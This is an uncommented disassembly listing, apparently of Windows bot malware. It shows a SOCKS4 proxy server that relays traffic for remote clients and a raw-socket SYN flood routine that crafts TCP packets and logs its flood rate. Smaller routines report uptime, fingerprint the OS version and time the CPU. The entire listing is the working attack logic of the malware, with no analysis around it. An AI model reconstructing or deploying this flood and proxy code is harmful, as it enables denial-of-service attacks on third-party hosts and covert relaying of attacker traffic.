push eax
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call sub_411FED
push esi
mov edi, eax
call sub_416D07
add esp, 24h
mov eax, edi
pop esi
loc_41215D: ; CODE XREF: sub_4120F4+22�j
pop edi
pop ebx
pop ebp
retn
sub_4120F4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412161 proc near ; CODE XREF: sub_41225E+200�p
var_504 = byte ptr -504h
var_104 = dword ptr -104h
var_100 = dword ptr -100h
var_FC = dword ptr -0FCh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 504h
push ebx
push esi
push edi
xor ebx, ebx
mov esi, 400h
loc_412174: ; CODE XREF: sub_412161+C0�j
; sub_412161+F2�j
mov eax, [ebp+arg_4]
xor ecx, ecx
inc ecx
mov [ebp+var_100], eax
mov [ebp+var_104], ecx
xor eax, eax
loc_412188: ; CODE XREF: sub_412161+36�j
mov edx, [ebp+arg_0]
cmp [ebp+eax*4+var_100], edx
jz short loc_412199
inc eax
cmp eax, ecx
jb short loc_412188
loc_412199: ; CODE XREF: sub_412161+31�j
cmp eax, ecx
jnz short loc_4121AD
mov [ebp+var_FC], edx
mov [ebp+var_104], 2
loc_4121AD: ; CODE XREF: sub_412161+3A�j
push ebx
xor eax, eax
push ebx
mov ecx, 100h
lea edi, [ebp+var_504]
rep stosd
push ebx
lea eax, [ebp+var_104]
push eax
push ebx
call dword_43A468 ; select
lea eax, [ebp+var_104]
push eax
push [ebp+arg_4]
call dword_43A414 ; __WSAFDIsSet
test eax, eax
jz short loc_41220F
push ebx
push esi
lea eax, [ebp+var_504]
push eax
push [ebp+arg_4]
call dword_43A324 ; recv
cmp eax, 0FFFFFFFFh
jz short loc_412259
push ebx
push eax
lea eax, [ebp+var_504]
push eax
push [ebp+arg_0]
call dword_43A458 ; send
cmp eax, 0FFFFFFFFh
jz short loc_412259
loc_41220F: ; CODE XREF: sub_412161+7E�j
lea eax, [ebp+var_104]
push eax
push [ebp+arg_0]
call dword_43A414 ; __WSAFDIsSet
test eax, eax
jz loc_412174
push ebx
push esi
lea eax, [ebp+var_504]
push eax
push [ebp+arg_0]
call dword_43A324 ; recv
cmp eax, 0FFFFFFFFh
jz short loc_412259
push ebx
push eax
lea eax, [ebp+var_504]
push eax
push [ebp+arg_4]
call dword_43A458 ; send
cmp eax, 0FFFFFFFFh
jnz loc_412174
loc_412259: ; CODE XREF: sub_412161+95�j
; sub_412161+AC�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_412161 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_41225E proc near ; DATA XREF: sub_41248E+13F�o
var_5D8 = dword ptr -5D8h
var_5D4 = dword ptr -5D4h
var_4D4 = byte ptr -4D4h
var_4D3 = byte ptr -4D3h
var_4D2 = word ptr -4D2h
var_4D0 = dword ptr -4D0h
var_4CC = byte ptr -4CCh
var_CC = byte ptr -0CCh
var_48 = byte ptr -48h
var_30 = dword ptr -30h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 5D8h
mov edx, [ebp+74h+arg_0]
push ebx
push esi
push edi
push 2Ch
pop ecx
mov esi, edx
lea edi, [ebp+74h+var_CC]
rep movsd
mov edi, [ebp+74h+var_30]
xor eax, eax
inc eax
mov [edx+0ACh], eax
mov esi, edi
mov [ebp+74h+var_5D8], eax
imul esi, 234h
mov ecx, dword_43B26C[esi]
xor ebx, ebx
lea eax, [ebp+74h+var_C]
push eax
push ebx
push ebx
lea eax, [ebp+74h+var_5D8]
push eax
push ebx
mov [ebp+74h+arg_0], edi
mov [ebp+74h+var_C], 5
mov [ebp+74h+var_8], ebx
mov [ebp+74h+var_5D4], ecx
call dword_43A468 ; select
test eax, eax
jnz short loc_4122D1
push dword_43B26C[esi]
jmp loc_412479
; ---------------------------------------------------------------------------
loc_4122D1: ; CODE XREF: sub_41225E+66�j
push ebx
push 408h
lea eax, [ebp+74h+var_4D4]
push eax
push dword_43B26C[esi]
call dword_43A324 ; recv
test eax, eax
jle loc_412473
cmp [ebp+74h+var_4D4], 4
jnz loc_412473
cmp [ebp+74h+var_4D3], 1
jnz loc_412473
cmp [ebp+74h+var_48], bl
jz loc_4123A7
lea eax, [ebp+74h+var_48]
lea edi, [ebp+74h+var_4CC]
loc_41231E: ; CODE XREF: sub_41225E+DC�j
mov dl, [edi]
mov cl, dl
cmp dl, [eax]
jnz short loc_412340
cmp cl, bl
jz short loc_41233C
mov dl, [edi+1]
mov cl, dl
cmp dl, [eax+1]
jnz short loc_412340
inc edi
inc edi
inc eax
inc eax
cmp cl, bl
jnz short loc_41231E
loc_41233C: ; CODE XREF: sub_41225E+CA�j
xor eax, eax
jmp short loc_412345
; ---------------------------------------------------------------------------
loc_412340: ; CODE XREF: sub_41225E+C6�j
; sub_41225E+D4�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_412345: ; CODE XREF: sub_41225E+E0�j
cmp eax, ebx
jz short loc_4123A7
lea eax, [ebp+74h+var_48]
push eax
lea eax, [ebp+74h+var_4CC]
push eax
push offset aSocks4Authenti ; "[SOCKS4]: Authentication failed. Remote"...
call sub_401F83
add esp, 0Ch
mov [ebp+74h+var_4D4], bl
mov [ebp+74h+var_4D3], 5Dh
loc_41236E: ; CODE XREF: sub_41225E+1C0�j
xor eax, eax
push ebx
mov ecx, 100h
lea edi, [ebp+74h+var_4CC]
rep stosd
push 8
lea eax, [ebp+74h+var_4D4]
push eax
push dword_43B26C[esi]
call dword_43A458 ; send
loc_412393: ; CODE XREF: sub_41225E+210�j
push dword_43B26C[esi]
call dword_43A4D0 ; closesocket
push [ebp+74h+arg_0]
jmp loc_412480
; ---------------------------------------------------------------------------
loc_4123A7: ; CODE XREF: sub_41225E+B1�j
; sub_41225E+E9�j
xor eax, eax
lea edi, [ebp+74h+var_1C]
stosd
stosd
stosd
stosd
mov ax, [ebp+74h+var_4D2]
push 6
mov [ebp+74h+var_1A], ax
mov eax, [ebp+74h+var_4D0]
push 1
push 2
mov [ebp+74h+var_1C], 2
mov [ebp+74h+var_18], eax
call dword_43A3BC ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+74h+var_4], eax
jnz short loc_4123EC
call dword_43A47C ; WSAGetLastError
push eax
push offset aSocks4ErrorFai ; "[SOCKS4]: Error: Failed to open socket("...
jmp short loc_41240A
; ---------------------------------------------------------------------------
loc_4123EC: ; CODE XREF: sub_41225E+17E�j
push 10h
lea ecx, [ebp+74h+var_1C]
push ecx
push eax
call dword_43A36C ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_412423
call dword_43A47C ; WSAGetLastError
push eax
push offset aSocks4ErrorF_0 ; "[SOCKS4]: Error: Failed to connect to t"...
loc_41240A: ; CODE XREF: sub_41225E+18C�j
call sub_401F83
pop ecx
pop ecx
mov [ebp+74h+var_4D4], bl
mov [ebp+74h+var_4D3], 5Bh
jmp loc_41236E
; ---------------------------------------------------------------------------
loc_412423: ; CODE XREF: sub_41225E+19E�j
xor eax, eax
push ebx
mov [ebp+74h+var_4D4], bl
mov [ebp+74h+var_4D3], 5Ah
mov ecx, 100h
lea edi, [ebp+74h+var_4CC]
rep stosd
push 8
lea eax, [ebp+74h+var_4D4]
push eax
push dword_43B26C[esi]
call dword_43A458 ; send
push dword_43B26C[esi]
push [ebp+74h+var_4]
call sub_412161
pop ecx
pop ecx
push [ebp+74h+var_4]
call dword_43A4D0 ; closesocket
jmp loc_412393
; ---------------------------------------------------------------------------
loc_412473: ; CODE XREF: sub_41225E+8E�j
; sub_41225E+9B�j ...
push dword_43B26C[esi]
loc_412479: ; CODE XREF: sub_41225E+6E�j
call dword_43A4D0 ; closesocket
push edi
loc_412480: ; CODE XREF: sub_41225E+144�j
call sub_4139F6
pop ecx
push ebx
call dword_422014 ; ExitThread
int 3 ; Trap to Debugger
sub_41225E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_41248E proc near ; DATA XREF: sub_409848+53B9�o
var_2D4 = byte ptr -2D4h
var_D4 = dword ptr -0D4h
var_D0 = byte ptr -0D0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 2D4h
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
mov esi, eax
push 2Ch
pop ecx
xor ebx, ebx
lea edi, [ebp+74h+var_D4]
rep movsd
push [ebp+74h+var_40]
inc ebx
mov [eax+0A8h], ebx
xor eax, eax
lea edi, [ebp+74h+var_14]
stosd
stosd
stosd
stosd
mov [ebp+74h+var_4], 10h
mov [ebp+74h+var_14], 2
call dword_43A514 ; ntohs
push 6
push ebx
xor esi, esi
push 2
mov [ebp+74h+var_12], ax
mov [ebp+74h+var_10], esi
call dword_43A3BC ; socket
mov edi, eax
mov eax, [ebp+74h+var_3C]
imul eax, 234h
mov dword_43B26C[eax], edi
push 10h
lea eax, [ebp+74h+var_14]
push eax
push edi
call dword_43A49C ; bind
test eax, eax
jnz loc_41261F
push 0Ah
push edi
call dword_43A4E8 ; listen
test eax, eax
jnz loc_41261F
push [ebp+74h+var_40]
push [ebp+74h+var_D4]
call sub_408894
pop ecx
push eax
lea eax, [ebp+74h+var_2D4]
push offset aSocks4ServerSt ; "[SOCKS4]: Server started on: %s:%d."
push eax
call sub_416975
add esp, 10h
cmp [ebp+74h+var_30], esi
jnz short loc_41255C
push esi
push [ebp+74h+var_34]
lea eax, [ebp+74h+var_2D4]
push eax
lea eax, [ebp+74h+var_D0]
push eax
push [ebp+74h+var_D4]
call sub_405D62
add esp, 14h
loc_41255C: ; CODE XREF: sub_41248E+B2�j
; sub_41248E+17A�j ...
lea eax, [ebp+74h+var_2D4]
push eax
call sub_401F0F
pop ecx
lea eax, [ebp+74h+var_4]
push eax
lea eax, [ebp+74h+var_24]
push eax
push edi
call dword_43A37C ; accept
push [ebp+74h+var_3C]
mov ebx, eax
movzx eax, [ebp+74h+var_22]
push eax
push [ebp+74h+var_20]
mov [ebp+74h+var_28], esi
call dword_43A440 ; inet_ntoa
push eax
lea eax, [ebp+74h+var_2D4]
push offset aSocks4ClientCo ; "[SOCKS4]: Client connection from IP: %s"...
push eax
call sub_416975
push ebx
lea eax, [ebp+74h+var_2D4]
push 12h
push eax
call sub_413732
mov ecx, [ebp+74h+var_3C]
mov [ebp+74h+var_38], eax
imul eax, 234h
add esp, 20h
mov dword_43B264[eax], ecx
lea eax, [ebp+74h+arg_0]
push eax
push esi
lea eax, [ebp+74h+var_D4]
push eax
push offset sub_41225E
push esi
push esi
call dword_42200C ; CreateThread
mov ecx, [ebp+74h+var_38]
imul ecx, 234h
cmp eax, esi
mov dword_43B274[ecx], eax
jnz short loc_412615
call dword_422008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+74h+var_2D4]
push offset aSocks4Failed_0 ; "[SOCKS4]: Failed to start client thread"...
push eax
call sub_416975
add esp, 0Ch
jmp loc_41255C
; ---------------------------------------------------------------------------
loc_41260D: ; CODE XREF: sub_41248E+18A�j
push 5
call dword_422000 ; Sleep
loc_412615: ; CODE XREF: sub_41248E+15D�j
cmp [ebp+74h+var_28], esi
jz short loc_41260D
jmp loc_41255C
; ---------------------------------------------------------------------------
loc_41261F: ; CODE XREF: sub_41248E+77�j
; sub_41248E+88�j
push edi
call dword_43A4D0 ; closesocket
push [ebp+74h+var_40]
lea eax, [ebp+74h+var_2D4]
push offset aSocks4Failed_1 ; "[SOCKS4]: Failed to start server on Por"...
push eax
call sub_416975
add esp, 0Ch
cmp [ebp+74h+var_30], esi
jnz short loc_41265C
push esi
push [ebp+74h+var_34]
lea eax, [ebp+74h+var_2D4]
push eax
lea eax, [ebp+74h+var_D0]
push eax
push [ebp+74h+var_D4]
call sub_405D62
add esp, 14h
loc_41265C: ; CODE XREF: sub_41248E+1B2�j
lea eax, [ebp+74h+var_2D4]
push eax
call sub_401F0F
push [ebp+74h+var_3C]
call sub_4139F6
pop ecx
pop ecx
push esi
call dword_422014 ; ExitThread
int 3 ; Trap to Debugger
sub_41248E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=68h
sub_41267A proc near ; CODE XREF: sub_4128F6+3C�p
var_288 = byte ptr -288h
var_F8 = byte ptr -0F8h
var_B8 = byte ptr -0B8h
var_B7 = byte ptr -0B7h
var_A4 = byte ptr -0A4h
var_98 = byte ptr -98h
var_90 = byte ptr -90h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = byte ptr -74h
var_73 = byte ptr -73h
var_72 = word ptr -72h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = word ptr -54h
var_52 = word ptr -52h
var_50 = dword ptr -50h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = byte ptr -30h
var_2E = word ptr -2Eh
var_2C = word ptr -2Ch
var_2A = word ptr -2Ah
var_28 = byte ptr -28h
var_27 = byte ptr -27h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_F = byte ptr -0Fh
var_E = word ptr -0Eh
var_C = word ptr -0Ch
var_A = word ptr -0Ah
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
lea ebp, [esp-68h]
sub esp, 288h
and [ebp+68h+var_B8], 0
push edi
push 0Eh
pop ecx
xor eax, eax
lea edi, [ebp+68h+var_B7]
rep stosd
stosw
stosb
lea eax, [ebp+68h+var_288]
push eax
push 202h
call dword_43A3CC ; WSAStartup
test eax, eax
jz short loc_4126B4
xor eax, eax
jmp loc_4128F0
; ---------------------------------------------------------------------------
loc_4126B4: ; CODE XREF: sub_41267A+31�j
push esi
xor edi, edi
inc edi
push edi
xor esi, esi
push esi
push esi
push 0FFh
push 3
push 2
call dword_43A334 ; WSASocketA
cmp eax, 0FFFFFFFFh
mov [ebp+68h+var_4], eax
jz loc_4128E7
push 4
lea ecx, [ebp+68h+var_3C]
push ecx
push 2
push esi
push eax
mov [ebp+68h+var_3C], edi
call dword_43A3D8 ; setsockopt
cmp eax, 0FFFFFFFFh
jz loc_4128DE
xor eax, eax
lea edi, [ebp+68h+var_54]
stosd
stosd
stosd
push ebx
push [ebp+68h+arg_8]
stosd
mov [ebp+68h+var_54], 2
call dword_43A514 ; ntohs
mov ebx, [ebp+68h+arg_0]
push 28h
mov [ebp+68h+var_52], ax
mov [ebp+68h+var_50], ebx
mov [ebp+68h+var_30], 45h
call dword_43A514 ; ntohs
push [ebp+68h+arg_8]
mov [ebp+68h+var_2E], ax
mov [ebp+68h+var_2C], 1
mov [ebp+68h+var_2A], si
mov [ebp+68h+var_28], 80h
mov [ebp+68h+var_27], 6
mov [ebp+68h+var_26], si
mov [ebp+68h+var_20], ebx
call dword_43A514 ; ntohs
push 4000h
mov [ebp+68h+var_1A], ax
mov [ebp+68h+var_14], esi
mov [ebp+68h+var_10], 50h
mov [ebp+68h+var_F], 2
call dword_43A514 ; ntohs
mov [ebp+68h+var_E], ax
lea eax, [ebp+68h+var_5C]
push eax
mov [ebp+68h+var_A], si
mov [ebp+68h+var_8], esi
call dword_42203C ; QueryPerformanceFrequency
lea eax, [ebp+68h+var_38]
push eax
call dword_422038 ; QueryPerformanceCounter
push [ebp+68h+var_58]
mov eax, [ebp+68h+arg_C]
push [ebp+68h+var_5C]
cdq
push edx
push eax
call sub_417220
add eax, [ebp+68h+var_38]
mov [ebp+68h+var_C], si
adc edx, [ebp+68h+var_34]
mov [ebp+68h+var_44], eax
mov [ebp+68h+var_40], edx
jmp short loc_4127D1
; ---------------------------------------------------------------------------
loc_4127A5: ; CODE XREF: sub_41267A+22F�j
add [ebp+68h+var_8], eax
lea eax, [ebp+68h+var_38]
push eax
call dword_422038 ; QueryPerformanceCounter
mov eax, [ebp+68h+var_34]
cmp eax, [ebp+68h+var_40]
jg loc_4128DA
jl short loc_4127CC
mov eax, [ebp+68h+var_38]
cmp eax, [ebp+68h+var_44]
jnb loc_4128DA
loc_4127CC: ; CODE XREF: sub_41267A+144�j
and [ebp+68h+var_C], 0
loc_4127D1: ; CODE XREF: sub_41267A+129�j
call sub_416B31
cdq
mov ecx, 3E9h
idiv ecx
add edx, 3E8h
push edx
call dword_43A514 ; ntohs
mov [ebp+68h+var_1C], ax
call sub_416B31
call sub_416B31
push eax
call dword_43A514 ; ntohs
push [ebp+68h+arg_4]
movzx eax, ax
mov [ebp+68h+var_18], eax
call dword_43A4EC ; ntohl
inc [ebp+68h+arg_4]
and [ebp+68h+var_74], 0
mov esi, eax
push 14h
mov [ebp+68h+var_24], esi
mov [ebp+68h+var_78], ebx
mov [ebp+68h+var_73], 6
call dword_43A514 ; ntohs
push 8
pop ecx
mov [ebp+68h+var_7C], esi
mov [ebp+68h+var_72], ax
push 5
lea esi, [ebp+68h+var_7C]
lea edi, [ebp+68h+var_B8]
rep movsd
pop ecx
lea eax, [ebp+68h+var_B8]
push 34h
lea esi, [ebp+68h+var_1C]
lea edi, [ebp+68h+var_98]
push eax
rep movsd
call sub_4088EA
push 5
pop ecx
push 5
lea esi, [ebp+68h+var_30]
lea edi, [ebp+68h+var_B8]
rep movsd
mov [ebp+68h+var_C], ax
pop ecx
lea esi, [ebp+68h+var_1C]
lea edi, [ebp+68h+var_A4]
rep movsd
xor eax, eax
lea edi, [ebp+68h+var_90]
stosd
lea eax, [ebp+68h+var_B8]
push 28h
push eax
call sub_4088EA
add esp, 10h
push 5
pop ecx
push 10h
mov [ebp+68h+var_26], ax
lea eax, [ebp+68h+var_54]
push eax
push 0
push 28h
lea eax, [ebp+68h+var_B8]
push eax
push [ebp+68h+var_4]
lea esi, [ebp+68h+var_30]
lea edi, [ebp+68h+var_B8]
rep movsd
call dword_43A38C ; sendto
cmp eax, 0FFFFFFFFh
jnz loc_4127A5
call dword_43A47C ; WSAGetLastError
push eax
lea eax, [ebp+68h+var_F8]
push offset aSynSendErrorD_ ; "[SYN]: Send error: <%d>."
push eax
call sub_416975
lea eax, [ebp+68h+var_F8]
push eax
call sub_401F0F
add esp, 10h
xor esi, esi
jmp short loc_4128DD
; ---------------------------------------------------------------------------
loc_4128DA: ; CODE XREF: sub_41267A+13E�j
; sub_41267A+14C�j
mov esi, [ebp+68h+var_8]
loc_4128DD: ; CODE XREF: sub_41267A+25E�j
pop ebx
loc_4128DE: ; CODE XREF: sub_41267A+74�j
push [ebp+68h+var_4]
call dword_43A4D0 ; closesocket
loc_4128E7: ; CODE XREF: sub_41267A+58�j
call dword_43A4DC ; WSACleanup
mov eax, esi
pop esi
loc_4128F0: ; CODE XREF: sub_41267A+35�j
pop edi
add ebp, 68h
leave
retn
sub_41267A endp
; =============== S U B R O U T I N E =======================================
sub_4128F6 proc near ; CODE XREF: sub_41294E+3C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push esi
push edi
push [esp+0Ch+arg_0]
call sub_40877E
push [esp+10h+arg_4]
mov esi, eax
call sub_416D02
push [esp+14h+arg_8]
mov ebx, eax
call sub_416D02
mov edi, eax
call sub_416B31
cdq
mov ecx, 200h
idiv ecx
push edi
push ebx
lea eax, [edx+esi+100h]
push eax
push esi
call sub_41267A
add esp, 1Ch
test eax, eax
jnz short loc_41293F
inc eax
loc_41293F: ; CODE XREF: sub_4128F6+46�j
cdq
mov ecx, 3E8h
idiv ecx
cdq
idiv edi
pop edi
pop esi
pop ebx
retn
sub_4128F6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41294E proc near ; DATA XREF: sub_409848+2D01�o
var_414 = byte ptr -414h
var_214 = dword ptr -214h
var_210 = byte ptr -210h
var_190 = byte ptr -190h
var_110 = byte ptr -110h
var_90 = byte ptr -90h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 414h
mov eax, [ebp+arg_0]
push esi
push edi
mov esi, eax
mov ecx, 85h
lea edi, [ebp+var_214]
rep movsd
mov dword ptr [eax+210h], 1
lea eax, [ebp+var_110]
push eax
lea eax, [ebp+var_190]
push eax
lea eax, [ebp+var_210]
push eax
call sub_4128F6
push eax
lea eax, [ebp+var_414]
push offset aSynDoneWithFlo ; "[SYN]: Done with flood (%iKB/sec)."
push eax
call sub_416975
xor esi, esi
add esp, 18h
cmp [ebp+var_8], esi
jnz short loc_4129CB
push esi
push [ebp+var_C]
lea eax, [ebp+var_414]
push eax
lea eax, [ebp+var_90]
push eax
push [ebp+var_214]
call sub_405D62
add esp, 14h
loc_4129CB: ; CODE XREF: sub_41294E+5B�j
lea eax, [ebp+var_414]
push eax
call sub_401F0F
push [ebp+var_10]
call sub_4139F6
pop ecx
pop ecx
push esi
call dword_422014 ; ExitThread
int 3 ; Trap to Debugger
sub_41294E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4129E9 proc near ; CODE XREF: start+74�p
; sub_409848+4D1B�p ...
arg_0 = dword ptr 4
push esi
push edi
call dword_422004 ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
xor edx, edx
mov ecx, 15180h
mov esi, 0E10h
push 3Ch
pop edi
sub eax, [esp+8+arg_0]
div ecx
mov ecx, eax
mov eax, edx
xor edx, edx
div esi
mov esi, eax
mov eax, edx
xor edx, edx
div edi
push eax
push esi
push ecx
push offset aDdDhDm ; "%dd %dh %dm"
push 32h
mov esi, offset dword_480D44
push esi
call sub_416BCD
add esp, 18h
pop edi
mov eax, esi
pop esi
retn
sub_4129E9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=78h
sub_412A3C proc near ; CODE XREF: sub_403E31+24�p
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_84 = dword ptr -84h
push ebp
lea ebp, [esp-78h]
sub esp, 94h
push esi
lea eax, [ebp+78h+var_94]
push eax
xor esi, esi
mov [ebp+78h+var_94], 94h
call dword_422120 ; GetVersionExA
test eax, eax
jz short loc_412AAC
cmp [ebp+78h+var_90], 4
jnz short loc_412A8E
cmp [ebp+78h+var_8C], esi
jnz short loc_412A7C
cmp [ebp+78h+var_84], 1
jnz short loc_412A71
inc esi
loc_412A71: ; CODE XREF: sub_412A3C+32�j
cmp [ebp+78h+var_84], 2
jnz short loc_412AAC
xor esi, esi
inc esi
jmp short loc_412AAC
; ---------------------------------------------------------------------------
loc_412A7C: ; CODE XREF: sub_412A3C+2C�j
cmp [ebp+78h+var_8C], 0Ah
jnz short loc_412A86
loc_412A82: ; CODE XREF: sub_412A3C+5B�j
push 2
jmp short loc_412AAB
; ---------------------------------------------------------------------------
loc_412A86: ; CODE XREF: sub_412A3C+44�j
cmp [ebp+78h+var_8C], 5Ah
jnz short loc_412AAC
jmp short loc_412A9F
; ---------------------------------------------------------------------------
loc_412A8E: ; CODE XREF: sub_412A3C+27�j
cmp [ebp+78h+var_90], 5
jnz short loc_412AAC
cmp [ebp+78h+var_8C], esi
jz short loc_412A82
cmp [ebp+78h+var_8C], 1
jnz short loc_412AA3
loc_412A9F: ; CODE XREF: sub_412A3C+50�j
push 3
jmp short loc_412AAB
; ---------------------------------------------------------------------------
loc_412AA3: ; CODE XREF: sub_412A3C+61�j
cmp [ebp+78h+var_8C], 2
jnz short loc_412AAC
push 7
loc_412AAB: ; CODE XREF: sub_412A3C+48�j
; sub_412A3C+65�j
pop esi
loc_412AAC: ; CODE XREF: sub_412A3C+21�j
; sub_412A3C+39�j ...
mov eax, esi
pop esi
add ebp, 78h
leave
retn
sub_412A3C endp
; =============== S U B R O U T I N E =======================================
sub_412AB4 proc near ; CODE XREF: sub_412B6A+240�p
push ebx
push esi
push edi
mov edi, 0F4240h
loc_412ABC: ; CODE XREF: sub_412AB4+2F�j
; sub_412AB4+35�j
rdtsc
push 3E8h
mov ebx, edx
mov esi, eax
call dword_422000 ; Sleep
rdtsc
push 0
sub eax, esi
push edi
sbb edx, ebx
push edx
push eax
call sub_4184F0
mov esi, edx
test esi, esi
mov ebx, eax
ja short loc_412ABC
jb short loc_412AEB
cmp ebx, edi
ja short loc_412ABC
loc_412AEB: ; CODE XREF: sub_412AB4+31�j
push 0
push 64h
push esi
push ebx
call sub_418470
mov ecx, edx
push 64h
xor edx, edx
test ecx, ecx
mov edi, eax
pop eax
ja short loc_412B5E
jb short loc_412B0A
cmp edi, 50h
jnb short loc_412B0F
loc_412B0A: ; CODE XREF: sub_412AB4+4F�j
push 4Bh
pop eax
xor edx, edx
loc_412B0F: ; CODE XREF: sub_412AB4+54�j
test ecx, ecx
ja short loc_412B5E
jb short loc_412B1A
cmp edi, 47h
jnb short loc_412B1F
loc_412B1A: ; CODE XREF: sub_412AB4+5F�j
push 42h
pop eax
xor edx, edx
loc_412B1F: ; CODE XREF: sub_412AB4+64�j
test ecx, ecx
ja short loc_412B5E
jb short loc_412B2A
cmp edi, 37h
jnb short loc_412B2F
loc_412B2A: ; CODE XREF: sub_412AB4+6F�j
push 32h
pop eax
xor edx, edx
loc_412B2F: ; CODE XREF: sub_412AB4+74�j
test ecx, ecx
ja short loc_412B5E
jb short loc_412B3A
cmp edi, 26h
jnb short loc_412B3F
loc_412B3A: ; CODE XREF: sub_412AB4+7F�j
push 21h
pop eax
xor edx, edx
loc_412B3F: ; CODE XREF: sub_412AB4+84�j
test ecx, ecx
ja short loc_412B5E
jb short loc_412B4A
cmp edi, 1Eh
jnb short loc_412B4F
loc_412B4A: ; CODE XREF: sub_412AB4+8F�j
push 19h
pop eax
xor edx, edx
loc_412B4F: ; CODE XREF: sub_412AB4+94�j
test ecx, ecx
ja short loc_412B5E
jb short loc_412B5A
cmp edi, 0Ah
jnb short loc_412B5E
loc_412B5A: ; CODE XREF: sub_412AB4+9F�j
xor eax, eax
xor edx, edx
loc_412B5E: ; CODE XREF: sub_412AB4+4D�j
; sub_412AB4+5D�j ...
sub eax, edi
sbb edx, ecx
add eax, ebx
pop edi
adc edx, esi
pop esi
pop ebx
retn
sub_412AB4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=70h
sub_412B6A proc near ; CODE XREF: sub_409848+4F12�p
var_7E8 = byte ptr -7E8h
var_668 = byte ptr -668h
var_5E8 = byte ptr -5E8h
var_568 = byte ptr -568h
var_4E8 = byte ptr -4E8h
var_3E4 = byte ptr -3E4h
var_2E8 = byte ptr -2E8h
var_25C = word ptr -25Ch
var_25A = byte ptr -25Ah
var_15C = byte ptr -15Ch
var_114 = byte ptr -114h
var_CC = dword ptr -0CCh
var_C8 = dword ptr -0C8h
var_C4 = dword ptr -0C4h
var_C0 = dword ptr -0C0h
var_BC = dword ptr -0BCh
var_B8 = byte ptr -0B8h
var_38 = byte ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_18 = byte ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
lea ebp, [esp-70h]
sub esp, 7E8h
push ebx
push esi
push edi
lea eax, [ebp+70h+var_CC]
push eax
mov [ebp+70h+var_4], 422B02h
mov [ebp+70h+var_CC], 94h
call dword_422120 ; GetVersionExA
xor ebx, ebx
cmp [ebp+70h+var_C8], 4
jnz short loc_412BDB
cmp [ebp+70h+var_C4], ebx
jnz short loc_412BBD
cmp [ebp+70h+var_BC], 1
jnz short loc_412BAA
mov [ebp+70h+var_4], offset a95 ; "95"
loc_412BAA: ; CODE XREF: sub_412B6A+37�j
cmp [ebp+70h+var_BC], 2
jnz loc_412C41
mov [ebp+70h+var_4], offset aNt ; "NT"
jmp short loc_412C18
; ---------------------------------------------------------------------------
loc_412BBD: ; CODE XREF: sub_412B6A+31�j
cmp [ebp+70h+var_C4], 0Ah
jnz short loc_412BCC
mov [ebp+70h+var_4], offset a98 ; "98"
jmp short loc_412C12
; ---------------------------------------------------------------------------
loc_412BCC: ; CODE XREF: sub_412B6A+57�j
cmp [ebp+70h+var_C4], 5Ah
jnz short loc_412C0B
mov [ebp+70h+var_4], offset aMe_0 ; "ME"
jmp short loc_412C12
; ---------------------------------------------------------------------------
loc_412BDB: ; CODE XREF: sub_412B6A+2C�j
cmp [ebp+70h+var_C8], 5
jnz short loc_412C0B
cmp [ebp+70h+var_C4], ebx
jnz short loc_412BEF
mov [ebp+70h+var_4], offset a2k ; "2K"
jmp short loc_412C12
; ---------------------------------------------------------------------------
loc_412BEF: ; CODE XREF: sub_412B6A+7A�j
cmp [ebp+70h+var_C4], 1
jnz short loc_412BFE
mov [ebp+70h+var_4], offset aXp_0 ; "XP"
jmp short loc_412C12
; ---------------------------------------------------------------------------
loc_412BFE: ; CODE XREF: sub_412B6A+89�j
cmp [ebp+70h+var_C4], 2
mov [ebp+70h+var_4], offset a2003 ; "2003"
jz short loc_412C12
